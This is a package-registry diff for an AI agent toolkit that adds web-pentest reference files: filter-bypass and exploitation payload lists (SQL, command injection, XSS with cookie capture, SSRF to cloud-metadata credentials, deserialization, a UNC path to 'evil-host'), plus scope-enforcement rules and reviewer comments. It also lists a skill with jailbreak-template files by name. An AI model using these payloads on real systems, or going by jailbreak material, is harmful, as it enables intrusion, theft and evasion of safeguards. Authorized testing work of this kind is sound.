mindforge-cc 11.5.1 → 11.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (214) hide show
  1. package/.agent/mindforge/skill-tdd.md +53 -0
  2. package/.agent/mindforge/skills-index.md +118 -0
  3. package/.agent/mindforge/systematic-debug.md +60 -0
  4. package/.agent/mindforge/wf-catalog.md +37 -0
  5. package/.agent/mindforge/wf-code-audit.md +31 -0
  6. package/.agent/mindforge/wf-competitive-analysis.md +31 -0
  7. package/.agent/mindforge/wf-deep-research.md +32 -0
  8. package/.agent/mindforge/wf-feature-planner.md +31 -0
  9. package/.agent/mindforge/wf-incident-response.md +31 -0
  10. package/.agent/mindforge/wf-onboard-codebase.md +31 -0
  11. package/.agent/mindforge/wf-perf-optimize.md +31 -0
  12. package/.agent/mindforge/wf-pr-review.md +31 -0
  13. package/.agent/mindforge/wf-refactor-plan.md +31 -0
  14. package/.agent/mindforge/wf-release-prep.md +31 -0
  15. package/.agent/mindforge/wf-tdd-sprint.md +31 -0
  16. package/.agent/mindforge/wf-tech-evaluation.md +31 -0
  17. package/.agent/skills/1password-skill/SKILL.md +156 -0
  18. package/.agent/skills/1password-skill/references/cli-examples.md +31 -0
  19. package/.agent/skills/1password-skill/references/get-started.md +21 -0
  20. package/.agent/skills/article-illustrator/SKILL.md +199 -0
  21. package/.agent/skills/article-illustrator/references/prompt-construction.md +426 -0
  22. package/.agent/skills/article-illustrator/references/style-presets.md +80 -0
  23. package/.agent/skills/article-illustrator/references/styles.md +224 -0
  24. package/.agent/skills/article-illustrator/references/usage.md +50 -0
  25. package/.agent/skills/article-illustrator/references/workflow.md +332 -0
  26. package/.agent/skills/arxiv/SKILL.md +275 -0
  27. package/.agent/skills/blogwatcher/SKILL.md +130 -0
  28. package/.agent/skills/code-wiki/SKILL.md +438 -0
  29. package/.agent/skills/code-wiki/templates/README.md +31 -0
  30. package/.agent/skills/code-wiki/templates/architecture.md +30 -0
  31. package/.agent/skills/code-wiki/templates/getting-started.md +47 -0
  32. package/.agent/skills/code-wiki/templates/module.md +38 -0
  33. package/.agent/skills/codebase-inspection/SKILL.md +109 -0
  34. package/.agent/skills/comic-creator/SKILL.md +240 -0
  35. package/.agent/skills/comic-creator/references/analysis-framework.md +176 -0
  36. package/.agent/skills/comic-creator/references/auto-selection.md +71 -0
  37. package/.agent/skills/comic-creator/references/base-prompt.md +98 -0
  38. package/.agent/skills/comic-creator/references/character-template.md +180 -0
  39. package/.agent/skills/comic-creator/references/ohmsha-guide.md +85 -0
  40. package/.agent/skills/comic-creator/references/partial-workflows.md +106 -0
  41. package/.agent/skills/comic-creator/references/storyboard-template.md +143 -0
  42. package/.agent/skills/comic-creator/references/workflow.md +401 -0
  43. package/.agent/skills/concept-diagrams/SKILL.md +355 -0
  44. package/.agent/skills/concept-diagrams/references/dashboard-patterns.md +43 -0
  45. package/.agent/skills/concept-diagrams/references/infrastructure-patterns.md +144 -0
  46. package/.agent/skills/concept-diagrams/references/physical-shape-cookbook.md +42 -0
  47. package/.agent/skills/creative-ideation/SKILL.md +144 -0
  48. package/.agent/skills/creative-ideation/references/full-prompt-library.md +110 -0
  49. package/.agent/skills/devops-cli/SKILL.md +149 -0
  50. package/.agent/skills/devops-cli/references/app-discovery.md +112 -0
  51. package/.agent/skills/devops-cli/references/authentication.md +59 -0
  52. package/.agent/skills/devops-cli/references/cli-reference.md +104 -0
  53. package/.agent/skills/devops-cli/references/running-apps.md +171 -0
  54. package/.agent/skills/devops-watchers/SKILL.md +103 -0
  55. package/.agent/skills/docker-management/SKILL.md +273 -0
  56. package/.agent/skills/domain-intel/SKILL.md +96 -0
  57. package/.agent/skills/duckduckgo-search/SKILL.md +230 -0
  58. package/.agent/skills/github-auth/SKILL.md +240 -0
  59. package/.agent/skills/github-code-review/SKILL.md +474 -0
  60. package/.agent/skills/github-code-review/references/review-output-template.md +74 -0
  61. package/.agent/skills/github-issues/SKILL.md +363 -0
  62. package/.agent/skills/github-issues/templates/bug-report.md +35 -0
  63. package/.agent/skills/github-issues/templates/feature-request.md +31 -0
  64. package/.agent/skills/github-pr-workflow/SKILL.md +360 -0
  65. package/.agent/skills/github-pr-workflow/references/ci-troubleshooting.md +183 -0
  66. package/.agent/skills/github-pr-workflow/references/conventional-commits.md +71 -0
  67. package/.agent/skills/github-pr-workflow/templates/pr-body-bugfix.md +35 -0
  68. package/.agent/skills/github-pr-workflow/templates/pr-body-feature.md +33 -0
  69. package/.agent/skills/github-repo-management/SKILL.md +509 -0
  70. package/.agent/skills/github-repo-management/references/github-api-cheatsheet.md +161 -0
  71. package/.agent/skills/godmode/SKILL.md +396 -0
  72. package/.agent/skills/godmode/references/jailbreak-templates.md +128 -0
  73. package/.agent/skills/godmode/references/refusal-detection.md +142 -0
  74. package/.agent/skills/hyperframes/SKILL.md +182 -0
  75. package/.agent/skills/hyperframes/references/cli.md +185 -0
  76. package/.agent/skills/hyperframes/references/composition.md +129 -0
  77. package/.agent/skills/hyperframes/references/features.md +289 -0
  78. package/.agent/skills/hyperframes/references/gsap.md +136 -0
  79. package/.agent/skills/hyperframes/references/troubleshooting.md +137 -0
  80. package/.agent/skills/hyperframes/references/website-to-video.md +145 -0
  81. package/.agent/skills/jupyter-live-kernel/SKILL.md +160 -0
  82. package/.agent/skills/kanban-orchestrator/SKILL.md +209 -0
  83. package/.agent/skills/kanban-worker/SKILL.md +188 -0
  84. package/.agent/skills/llm-wiki/SKILL.md +499 -0
  85. package/.agent/skills/meme-generation/SKILL.md +122 -0
  86. package/.agent/skills/node-inspect-debugger/SKILL.md +312 -0
  87. package/.agent/skills/obsidian/SKILL.md +60 -0
  88. package/.agent/skills/osint-investigation/SKILL.md +269 -0
  89. package/.agent/skills/osint-investigation/templates/source-template.md +59 -0
  90. package/.agent/skills/oss-forensics/SKILL.md +422 -0
  91. package/.agent/skills/oss-forensics/references/evidence-types.md +89 -0
  92. package/.agent/skills/oss-forensics/references/github-archive-guide.md +184 -0
  93. package/.agent/skills/oss-forensics/references/investigation-templates.md +131 -0
  94. package/.agent/skills/oss-forensics/references/recovery-techniques.md +164 -0
  95. package/.agent/skills/oss-forensics/templates/forensic-report.md +151 -0
  96. package/.agent/skills/oss-forensics/templates/malicious-package-report.md +43 -0
  97. package/.agent/skills/parallel-cli/SKILL.md +384 -0
  98. package/.agent/skills/pinggy-tunnel/SKILL.md +302 -0
  99. package/.agent/skills/pixel-art/SKILL.md +209 -0
  100. package/.agent/skills/pixel-art/references/palettes.md +49 -0
  101. package/.agent/skills/plan/SKILL.md +331 -0
  102. package/.agent/skills/polymarket/SKILL.md +75 -0
  103. package/.agent/skills/polymarket/references/api-endpoints.md +220 -0
  104. package/.agent/skills/python-debugpy/SKILL.md +368 -0
  105. package/.agent/skills/requesting-code-review/SKILL.md +273 -0
  106. package/.agent/skills/research-paper-writing/SKILL.md +2367 -0
  107. package/.agent/skills/research-paper-writing/references/autoreason-methodology.md +394 -0
  108. package/.agent/skills/research-paper-writing/references/checklists.md +434 -0
  109. package/.agent/skills/research-paper-writing/references/citation-workflow.md +563 -0
  110. package/.agent/skills/research-paper-writing/references/experiment-patterns.md +728 -0
  111. package/.agent/skills/research-paper-writing/references/human-evaluation.md +476 -0
  112. package/.agent/skills/research-paper-writing/references/paper-types.md +481 -0
  113. package/.agent/skills/research-paper-writing/references/reviewer-guidelines.md +433 -0
  114. package/.agent/skills/research-paper-writing/references/sources.md +191 -0
  115. package/.agent/skills/research-paper-writing/references/writing-guide.md +474 -0
  116. package/.agent/skills/research-paper-writing/templates/README.md +251 -0
  117. package/.agent/skills/rest-graphql-debug/SKILL.md +507 -0
  118. package/.agent/skills/s6-container-supervision/SKILL.md +171 -0
  119. package/.agent/skills/scrapling/SKILL.md +328 -0
  120. package/.agent/skills/sherlock/SKILL.md +186 -0
  121. package/.agent/skills/simplify-code/SKILL.md +168 -0
  122. package/.agent/skills/skill-authoring/SKILL.md +158 -0
  123. package/.agent/skills/spike/SKILL.md +190 -0
  124. package/.agent/skills/subagent-driven-development/SKILL.md +345 -0
  125. package/.agent/skills/subagent-driven-development/references/context-budget-discipline.md +53 -0
  126. package/.agent/skills/subagent-driven-development/references/gates-taxonomy.md +93 -0
  127. package/.agent/skills/systematic-debugging/SKILL.md +360 -0
  128. package/.agent/skills/test-driven-development/SKILL.md +336 -0
  129. package/.agent/skills/video-orchestrator/SKILL.md +194 -0
  130. package/.agent/skills/video-orchestrator/references/examples.md +227 -0
  131. package/.agent/skills/video-orchestrator/references/intake.md +166 -0
  132. package/.agent/skills/video-orchestrator/references/kanban-setup.md +278 -0
  133. package/.agent/skills/video-orchestrator/references/monitoring.md +180 -0
  134. package/.agent/skills/video-orchestrator/references/role-archetypes.md +298 -0
  135. package/.agent/skills/video-orchestrator/references/tool-matrix.md +317 -0
  136. package/.agent/skills/web-pentest/SKILL.md +332 -0
  137. package/.agent/skills/web-pentest/references/bypass-techniques.md +133 -0
  138. package/.agent/skills/web-pentest/references/exploitation-techniques.md +204 -0
  139. package/.agent/skills/web-pentest/references/scope-enforcement.md +110 -0
  140. package/.agent/skills/web-pentest/references/vuln-taxonomy.md +81 -0
  141. package/.agent/skills/web-pentest/templates/authorization.md +69 -0
  142. package/.agent/skills/web-pentest/templates/pentest-report.md +178 -0
  143. package/.claude/commands/mindforge/skill-tdd.md +53 -0
  144. package/.claude/commands/mindforge/skills-index.md +118 -0
  145. package/.claude/commands/mindforge/systematic-debug.md +60 -0
  146. package/.claude/commands/mindforge/wf-catalog.md +37 -0
  147. package/.claude/commands/mindforge/wf-code-audit.md +31 -0
  148. package/.claude/commands/mindforge/wf-competitive-analysis.md +31 -0
  149. package/.claude/commands/mindforge/wf-deep-research.md +32 -0
  150. package/.claude/commands/mindforge/wf-feature-planner.md +31 -0
  151. package/.claude/commands/mindforge/wf-incident-response.md +31 -0
  152. package/.claude/commands/mindforge/wf-onboard-codebase.md +31 -0
  153. package/.claude/commands/mindforge/wf-perf-optimize.md +31 -0
  154. package/.claude/commands/mindforge/wf-pr-review.md +31 -0
  155. package/.claude/commands/mindforge/wf-refactor-plan.md +31 -0
  156. package/.claude/commands/mindforge/wf-release-prep.md +31 -0
  157. package/.claude/commands/mindforge/wf-tdd-sprint.md +31 -0
  158. package/.claude/commands/mindforge/wf-tech-evaluation.md +31 -0
  159. package/.mindforge/config.json +2 -2
  160. package/.mindforge/dynamic-workflows/REGISTRY.md +65 -0
  161. package/.mindforge/dynamic-workflows/index.json +171 -0
  162. package/.mindforge/dynamic-workflows/scripts/code-audit.js +103 -0
  163. package/.mindforge/dynamic-workflows/scripts/competitive-analysis.js +85 -0
  164. package/.mindforge/dynamic-workflows/scripts/deep-research.js +151 -0
  165. package/.mindforge/dynamic-workflows/scripts/feature-planner.js +104 -0
  166. package/.mindforge/dynamic-workflows/scripts/incident-response.js +106 -0
  167. package/.mindforge/dynamic-workflows/scripts/onboard-codebase.js +102 -0
  168. package/.mindforge/dynamic-workflows/scripts/perf-optimize.js +128 -0
  169. package/.mindforge/dynamic-workflows/scripts/pr-review.js +87 -0
  170. package/.mindforge/dynamic-workflows/scripts/refactor-plan.js +121 -0
  171. package/.mindforge/dynamic-workflows/scripts/release-prep.js +102 -0
  172. package/.mindforge/dynamic-workflows/scripts/tdd-sprint.js +103 -0
  173. package/.mindforge/dynamic-workflows/scripts/tech-evaluation.js +72 -0
  174. package/.mindforge/memory/sync-manifest.json +1 -1
  175. package/.mindforge/skills/arxiv/SKILL.md +294 -0
  176. package/.mindforge/skills/blogwatcher/SKILL.md +147 -0
  177. package/.mindforge/skills/code-wiki/SKILL.md +457 -0
  178. package/.mindforge/skills/codebase-inspection/SKILL.md +126 -0
  179. package/.mindforge/skills/concept-diagrams/SKILL.md +373 -0
  180. package/.mindforge/skills/creative-ideation/SKILL.md +162 -0
  181. package/.mindforge/skills/domain-intel/SKILL.md +116 -0
  182. package/.mindforge/skills/duckduckgo-search/SKILL.md +249 -0
  183. package/.mindforge/skills/github-code-review/SKILL.md +493 -0
  184. package/.mindforge/skills/github-issues/SKILL.md +382 -0
  185. package/.mindforge/skills/github-pr-workflow/SKILL.md +379 -0
  186. package/.mindforge/skills/jupyter-live-kernel/SKILL.md +179 -0
  187. package/.mindforge/skills/kanban-orchestrator/SKILL.md +227 -0
  188. package/.mindforge/skills/kanban-worker/SKILL.md +206 -0
  189. package/.mindforge/skills/meme-generation/SKILL.md +141 -0
  190. package/.mindforge/skills/obsidian/SKILL.md +80 -0
  191. package/.mindforge/skills/osint-investigation/SKILL.md +288 -0
  192. package/.mindforge/skills/oss-forensics/SKILL.md +421 -0
  193. package/.mindforge/skills/pixel-art/SKILL.md +228 -0
  194. package/.mindforge/skills/plan/SKILL.md +350 -0
  195. package/.mindforge/skills/requesting-code-review/SKILL.md +292 -0
  196. package/.mindforge/skills/research-paper-writing/SKILL.md +2384 -0
  197. package/.mindforge/skills/scrapling/SKILL.md +345 -0
  198. package/.mindforge/skills/sherlock/SKILL.md +203 -0
  199. package/.mindforge/skills/simplify-code/SKILL.md +187 -0
  200. package/.mindforge/skills/spike/SKILL.md +209 -0
  201. package/.mindforge/skills/subagent-driven-development/SKILL.md +364 -0
  202. package/.mindforge/skills/systematic-debugging/SKILL.md +379 -0
  203. package/.mindforge/skills/test-driven-development/SKILL.md +355 -0
  204. package/.mindforge/skills/web-pentest/SKILL.md +327 -0
  205. package/CHANGELOG.md +71 -0
  206. package/MINDFORGE.md +2 -2
  207. package/README.md +72 -3
  208. package/RELEASENOTES.md +109 -0
  209. package/bin/installer-core.js +6 -2
  210. package/bin/mindforge-cli.js +7 -0
  211. package/bin/workflows/workflow-runner.js +110 -0
  212. package/docs/commands-reference.md +25 -0
  213. package/docs/getting-started.md +42 -5
  214. package/package.json +2 -1
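--- a/package/.agent/skills/web-pentest/references/bypass-techniques.md
+++ b/package/.agent/skills/web-pentest/references/bypass-techniques.md
@@ -0,0 +1,133 @@
+# Bypass Techniques
+
+Common filter/WAF bypasses. Used during the bypass-exhaustion phase
+before classifying a finding as false positive.
+
+A finding may only be marked `false_positive` AFTER the relevant
+bypass set has been exhausted and the witnesses still fail.
+
+## SQL Injection Bypasses
+
+When `'` is filtered/escaped:
+- Numeric injection: drop the quote, use `1 OR 1=1`
+- Different quote: `"` instead of `'`
+- Comment-based: `1/**/OR/**/1=1`
+- Hex literal: `0x61646d696e` for `admin`
+- `CHAR(65,66)` for `AB`
+- Case variation: `OoRr` (often stripped to `OR`)
+- Inline comments: `O/**/R`
+- Null byte: `' %00 OR '1`=`1`
+- Double URL encoding: `%2527` for `'`
+- Multi-byte: `%bf%27` (works against some single-byte unescape)
+
+## Command Injection Bypasses
+
+When semicolons filtered:
+- Newline: `%0Asleep 5`
+- Carriage return: `%0Dsleep 5`
+- Pipe: `|sleep 5`, `||sleep 5`
+- Background: `&sleep 5`, `&&sleep 5`
+- Substitution: `$(sleep 5)`, `` `sleep 5` ``
+- Globbing: `/???/?l??p 5` for `/bin/sleep 5`
+- IFS for spaces: `sleep${IFS}5`, `sleep$IFS$95`
+- Quote evasion: `s""leep 5`, `s'l'eep 5`
+- Variable: `a=sl;b=eep;${a}${b} 5`
+- Encoding: `bash<<<$(base64 -d <<< c2xlZXAgNQo=)`
+
+## Path Traversal Bypasses
+
+When `../` filtered:
+- URL-encoded: `%2e%2e%2f`
+- Double URL-encoded: `%252e%252e%252f`
+- Unicode: `%c0%ae%c0%ae%c0%af`, `%uff0e%uff0e%u2215`
+- Mixed: `..%2f`, `%2e./`
+- Null byte (older platforms): `../../../etc/passwd%00.png`
+- Backslash on Windows: `..\..\..\windows\win.ini`
+- Absolute path: `/etc/passwd` (skips traversal entirely)
+
+When base dir is prepended (`/var/www/uploads/${v}`):
+- The traversal still works if `realpath` not enforced
+- Try ending the path early: `../../etc/passwd%00`
+
+## XSS Bypasses
+
+When `<script>` blocked:
+- `<img src=x onerror=...>`
+- `<svg/onload=...>`
+- `<iframe srcdoc="...">`
+- `<details ontoggle=...>` (HTML5)
+- `<video><source onerror=...>`
+- `<input autofocus onfocus=...>`
+
+When parens filtered:
+- Template literals: `onerror=alert\`1\``
+- `onerror=eval('alert(1)')` → `onerror=eval(name)` + set
+`window.name` from attacker page
+
+When event handlers stripped:
+- `<a href="javascript:alert(1)">` (often still works)
+- `<form action="javascript:alert(1)"><input type=submit>`
+- SVG: `<svg><animate attributeName=href values=javascript:alert(1) ...>`
+
+When `alert` filtered:
+- `confirm(1)`, `prompt(1)`, `print()`
+- `top.alert(1)`, `self['ale'+'rt'](1)`
+- `window['ale\u0072t'](1)` (unicode in property access)
+- `Function("alert(1)")()`
+
+CSP bypasses (require CSP misconfig):
+- `unsafe-inline` allows everything
+- `unsafe-eval` allows `eval`/`Function`
+- Wildcard sources (`*.googleapis.com`) — angular/jsonp gadgets
+- `'strict-dynamic'` without nonce/hash on inline → still blocked but
+external scripts allowed via trusted loader
+- Old CSP without `default-src`/`script-src` → only blocks listed
+
+## Authentication Bypasses
+
+- HTTP verb tampering: `GET /admin` blocked → try `POST`, `PUT`, `OPTIONS`
+- Path normalization: `/admin/` blocked → try `/admin`, `/admin/.`,
+`/admin/x/..`, `//admin`, `/%2e/admin`, `/Admin` (case)
+- Header injection: `X-Original-URL: /admin`, `X-Forwarded-For: 127.0.0.1`,
+`X-Real-IP: 127.0.0.1`, `X-Forwarded-Proto: https`
+- Trailing chars: `/admin#`, `/admin?`, `/admin/`, `/admin.json`,
+`/admin..;/`, `/admin/..;/`
+- Method confusion via `X-HTTP-Method-Override: GET`
+
+## SSRF Bypasses
+
+When `127.0.0.1` blocked:
+- IPv6 loopback: `[::1]`, `[0:0:0:0:0:0:0:1]`
+- Decimal IP: `2130706433` for `127.0.0.1`
+- Hex IP: `0x7f000001`
+- Octal: `0177.0.0.1`
+- Short form: `127.1`, `0.0.0.0`, `0`
+- DNS rebinding: control a DNS server, return `127.0.0.1` on second
+resolution (TTL=0)
+- DNS records that resolve to internal IPs: `localtest.me` (127.0.0.1)
+- URL parsing differentials: `http://allowed-host@127.0.0.1`,
+`http://127.0.0.1#@allowed-host`
+- IDN homograph: `http://1.0.0.1` (fullwidth dots)
+
+When schemes blocked:
+- `gopher://`, `dict://`, `file://`, `ftp://`
+- `data:` (for content-type bypass)
+- `jar:` (Java)
+
+## Rate Limit Bypasses
+
+- Header rotation: `X-Forwarded-For`, `X-Real-IP`, `X-Originating-IP`,
+`X-Client-IP`, `X-Cluster-Client-IP`, `Forwarded`
+- Case: `X-FORWARDED-FOR`
+- User-Agent variation
+- Different endpoint that hits same handler
+
+## Bypass Discipline
+
+For each bypass attempt:
+1. Note WHAT you tried and WHY it might work (in your evidence log)
+2. Capture the response
+3. If still blocked, move to the next item in the bypass set
+4. Only after the documented bypass set is exhausted do you write
+`verdict: false_positive` with reason "bypass set exhausted; defense
+appears effective for this slot type."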
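Review bot: The null-byte SQLi entry in the SQL Injection section is malformed as written: the backticks split the payload at `'1` and leave the `=` outside the code span, so an agent copying it sends a truncated string; the intended payload is presumably `' %00 OR '1'='1`. The IDN homograph example `http://1.0.0.1` has lost its fullwidth characters (it is plain ASCII and is not loopback), so it no longer demonstrates anything; spell out the code points (U+FF0E for the fullwidth dot) so the example survives normalization. The SSRF section also carries no scope gate, unlike exploitation-techniques.md, and "control a DNS server" should be operator-owned infrastructure; add `Only probe inner URLs the operator approved — see scope-enforcement.md, Pre-Send Checklist item 4.` at the top of that section.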
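--- a/package/.agent/skills/web-pentest/references/exploitation-techniques.md
+++ b/package/.agent/skills/web-pentest/references/exploitation-techniques.md
@@ -0,0 +1,204 @@
+# Exploitation Techniques
+
+Per-class playbooks. Use these as starting points for witness payloads.
+ALWAYS apply scope enforcement before sending anything from this file.
+
+## Injection
+
+### SQL Injection
+
+Witness sequence (UNION-blind safe):
+1. Baseline: capture response for original parameter
+2. `' AND 1=1--` (true branch)
+3. `' AND 1=2--` (false branch)
+4. Compare lengths/bodies. Difference = SQLi.
+
+Time-based:
+- MySQL: `' AND SLEEP(5)--`
+- Postgres: `'; SELECT pg_sleep(5)--`
+- MSSQL: `'; WAITFOR DELAY '0:0:5'--`
+- SQLite: `' AND randomblob(100000000)--` (CPU-burn alternative)
+
+DO NOT send: `'; DROP TABLE` payloads. Reproducing the bug doesn't
+require destruction.
+
+### Command Injection
+
+Witness:
+- Linux: `; sleep 5` or `$(sleep 5)` or `` `sleep 5` ``
+- Windows: `& timeout /t 5`
+- If output is reflected: `; echo HERMESPENTEST-$(id)`
+
+Blind: time-delay probe is universally safe. Don't `rm -rf`.
+
+### Path Traversal
+
+Witness: `../../../../etc/passwd` (Linux) or `..\..\..\..\windows\win.ini` (Windows).
+Try with: URL-encoded, double-encoded, Unicode (`%c0%ae%c0%ae`),
+and SMB UNC (`\\evil-host\share` — only with operator OK).
+
+### SSTI (Server-Side Template Injection)
+
+Witness:
+- Jinja2: `{{7*7}}` → `49`
+- Twig: `{{7*7}}` → `49`
+- Smarty: `{$smarty.version}` or `{php}echo 1;{/php}`
+- ERB: `<%= 7*7 %>` → `49`
+- Velocity: `#set($x=7*7)$x`
+
+Detection is the 49 (or template-specific equivalent). Don't go to RCE
+without operator OK.
+
+### Deserialization
+
+If you can identify the format:
+- Pickle: send `cos\nsystem\n(S'sleep 5'\ntR.` (base64'd, in the
+right context). Witness via time delay.
+- YAML: `!!python/object/apply:os.system ["sleep 5"]`
+- Java serialized: ysoserial gadgets, only with operator OK because
+these almost always RCE.
+
+## XSS
+
+### Reflected
+
+Witness: `<svg/onload=fetch("/HERMES-PENTEST-XSS-"+document.cookie)>`
+where the path is one you'll grep for in server logs. NEVER use
+`alert(1)` — pop-ups annoy real users if your "test" target has any.
+
+If reflected unencoded → L3 confirmed.
+
+### Stored
+
+Witness in a way that ONLY YOUR test account sees first. Use a unique
+marker per finding. If the marker fires for other users → L4 critical.
+
+Pattern: `<svg/onload=fetch("/HERMES-${runId}-${vulnId}")>`. Add a
+server-side log grep step to your evidence.
+
+### DOM XSS
+
+Inspect every `document.write`, `innerHTML`, `eval`, `setTimeout(string)`,
+`Function(string)`, `setAttribute("href", ...)` site. The taint source
+is usually `location.hash`, `location.search`, `localStorage`,
+`postMessage` data, URL fragments.
+
+Witness: navigate to `#<img src=x onerror=...>`. Confirm the
+sink fires.
+
+## Auth
+
+### Login Bypass
+
+- SQLi in login: `' OR '1'='1` (very old, but check)
+- Boolean defaults: `username: admin, password: admin/password/123456`
+(only on lab targets, not production)
+- Account enumeration: timing or response difference between
+"unknown user" vs "wrong password"
+- Rate limiting: send 50 wrong passwords in 30s; see if you're throttled
+
+### JWT Attacks
+
+1. **alg:none**: change header to `{"alg":"none","typ":"JWT"}`, strip
+signature. If accepted → critical.
+2. **alg confusion**: HS256 signed with the RS256 public key. If the
+server stores the RS256 cert as a "secret" and the algorithm is
+attacker-controlled, this works.
+3. **Weak HMAC secret**: try `jwt_tool` or `hashcat` against the JWT
+with rockyou.txt (only if you have operator OK to crack).
+4. **kid header injection**: `kid` set to a SQLi payload or path-traversal
+to load a known key.
+5. **Expired token still accepted**: replay an old token.
+
+### Session
+
+- Cookie attrs: `Secure`, `HttpOnly`, `SameSite=Strict|Lax`.
+- Session fixation: log in, note cookie, log out, log in again — same
+cookie? Vulnerable.
+- Logout: does logout invalidate server-side, or just clear the client?
+
+### Password Reset
+
+- Predictable token (timestamp, sequential, weak random)
+- Host header poisoning in reset link (`Host: evil.test`)
+- No rate limit on reset endpoint
+- Token reuse / no expiry
+- Email enumeration via reset response
+
+## Authz (Access Control)
+
+### IDOR
+
+Pattern: change `?id=123` to `?id=124`. If you see another user's data,
+L3 confirmed.
+
+Variants:
+- Sequential IDs (easy)
+- UUIDs (still try — they leak in logs/responses)
+- Mass assignment: send extra params like `is_admin: true`, `role: admin`
+- HTTP method override: `GET /users/123` works, but `PUT /users/123` is
+not authz-checked
+
+### Privilege Escalation
+
+Vertical: regular user → admin endpoint. Check:
+- `/admin/*` accessible to non-admin?
+- `role` field in JWT/session client-editable?
+- Tenant ID swap: `tenant_id=mine` → `tenant_id=theirs`
+
+Horizontal: user A → user B same role. Reuse IDOR patterns.
+
+### Business Logic
+
+- Negative quantity in cart
+- Race conditions (double-spend, atomicity)
+- Workflow skip (POST to step 3 without doing step 2)
+- Coupon stacking
+- Discount > total
+
+## SSRF
+
+Witnesses for SSRF probing (only to hosts the operator approved):
+
+- Operator-owned callback (`https://hermes-callback.example/abcdef`)
+— confirms the request left the target's network
+- Internal recon (operator OK + scope): `http://127.0.0.1:6379/`,
+`http://127.0.0.1:9200/`, `http://[::1]:80/`
+
+Cloud metadata (operator OK + your own infra):
+- AWS: `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
+- GCP: `http://metadata.google.internal/computeMetadata/v1/` (needs
+`Metadata-Flavor: Google`)
+- Azure: `http://169.254.169.254/metadata/identity/oauth2/token`
+- Alibaba/Aliyun: `http://100.100.100.200/`
+
+Protocol smuggling:
+- `gopher://` for Redis/Memcache/SMTP attacks (only with operator OK)
+- `file:///` for local file read
+- `dict://` for service probing
+
+## Infra
+
+- Headers audit: missing `Strict-Transport-Security`, `Content-Security-Policy`,
+`X-Content-Type-Options: nosniff`, `X-Frame-Options`/`frame-ancestors`,
+`Referrer-Policy`
+- TLS audit: weak ciphers, missing HSTS, mixed content
+- Information disclosure: `Server:`, `X-Powered-By:`, error stack traces,
+default landing pages (`/server-status`, `/.git/`, `/.env`, `/phpinfo.php`)
+- Default creds: only on lab targets
+- Open redirects: `?next=https://evil.example/` — confirms misuse for
+phishing chains
+
+## Defense Recognition (don't waste cycles)
+
+Skip past these — they're working defenses, not vulns:
+
+- Parameterized queries via the language's standard binding
+- Content Security Policy with no `unsafe-inline`/`unsafe-eval` and
+a strict source list
+- argv-list subprocess invocation (Python `subprocess.run([...])`
+without `shell=True`)
+- `yaml.safe_load`, JSON-only deserialization
+- Allowlist-based redirects to a small set of known hosts
+- Auth checks with explicit "owner == current_user" on every record fetch
+- JWT verification with both `alg` allowlist and `iss`/`aud`/`exp` checks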
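Review bot: The Reflected XSS witness `fetch("/HERMES-PENTEST-XSS-"+document.cookie)` writes the cookies of whichever browser renders it into the target's access logs; on a stored sink that fires for other users this exfiltrates real users' session material, which contradicts the "ONLY YOUR test account sees first" rule a few lines below. A unique marker already proves execution, so use the Stored pattern `fetch("/HERMES-${runId}-${vulnId}")` for both variants and drop `document.cookie`. The SQLite time-based alternative `randomblob(100000000)` asks the database to allocate roughly 100 MB per request, which is a resource-exhaustion probe rather than a sleep and sits oddly under "DO NOT send destructive payloads"; prefer the boolean-blind witness for SQLite or start with a much smaller size. The "send 50 wrong passwords in 30s" rate-limit check can lock a real account — qualify it with "test accounts only", as the default-credentials line already does.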
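--- a/package/.agent/skills/web-pentest/references/scope-enforcement.md
+++ b/package/.agent/skills/web-pentest/references/scope-enforcement.md
@@ -0,0 +1,110 @@
+# Scope Enforcement
+
+The pentest skill is dangerous because the agent can drive network tools
+unattended. The single most important rule: **every active request must
+target a host the operator authorized.** This file is the procedure.
+
+## The Three Authorities
+
+1. `engagement/authorization.md` — what the operator wrote down.
+2. `engagement/scope.txt` — the machine-readable allowlist.
+3. The current shell prompt — implicit: "I'm running inside
+the operator's box."
+
+If any of those three disagree, you STOP and ask. Don't try to reconcile.
+
+## scope.txt format
+
+One target per line. Comments with `#`.
+
+```
+# Hostnames — resolved at use time
+localhost
+127.0.0.1
+::1
+staging.example.com
+api-staging.example.com
+
+# CIDR — internal labs only, requires operator OK in writing
+192.168.50.0/24
+10.0.5.0/24
+```
+
+Wildcards are NOT supported. If you need `*.staging.example.com`, list
+each host explicitly. This is on purpose: subdomain wildcards in
+authorization scope are how unauthorized testing happens.
+
+## Host Extraction Rules
+
+Before any active request, extract the target host from the command
+or URL and confirm it's in scope.
+
+| Surface | Where the host lives | Example |
+|---------|----------------------|---------|
+| `curl URL` | The URL | `curl https://staging.example.com/login` |
+| `curl --resolve HOST:PORT:ADDR` | HOST | reject — resolve overrides scope |
+| `nmap TARGET` | Each TARGET arg | `nmap 10.0.5.5 staging.example.com` |
+| `whatweb URL` | The URL | `whatweb https://staging.example.com` |
+| `browser_navigate(url)` | The URL | python-side: extract host from `url` |
+| Tool-driven HTTP (sqlmap, wfuzz, gobuster) | `-u`, `-h`, target arg | depends on tool |
+
+For URLs: `urllib.parse.urlparse(url).hostname.lower()`.
+For raw IPs: keep as IP, check against CIDR entries with
+`ipaddress.ip_address(host) in ipaddress.ip_network(cidr)`.
+
+## Pre-Send Checklist
+
+For every active request, before you press enter:
+
+1. Did you extract the host correctly? (URL host, not Host header, not
+`--resolve` aliasing.)
+2. Is the host in scope.txt (exact hostname match) OR is its resolved
+IP in a scope.txt CIDR?
+3. If it's a redirect target you're following, did you re-check scope
+on the redirect URL?
+4. If it's the second hop of an SSRF probe, is the inner URL in scope?
+(Usually NOT — that's the whole point. Don't auto-fire.)
+5. Did the operator approve this class of payload? (Read-only recon
+is auto-OK; destructive payloads need explicit OK.)
+
+If any answer is "no" or "not sure," STOP and ask the operator.
+
+## Things That Look In-Scope But Aren't
+
+- **Redirects to a parent or sister host.** `staging.example.com` →
+`auth.example.com` is a different host. Stop, re-confirm.
+- **CNAMEs.** `app.staging.example.com` may CNAME to
+`prod-cluster.aws.example.com`. Resolve and check IP, not just name.
+- **Cloud metadata IPs.** `169.254.169.254` is not in any sane
+scope.txt. If your SSRF candidate resolves there, you're probably
+testing against a real cloud host and need explicit approval before
+the probe.
+- **127.0.0.1 / localhost on a shared box.** If you're in a container
+or shared dev box, `localhost` may be someone else's service.
+Confirm with the operator that 127.0.0.1 means what they think.
+- **External services the target depends on.** Stripe API, OAuth
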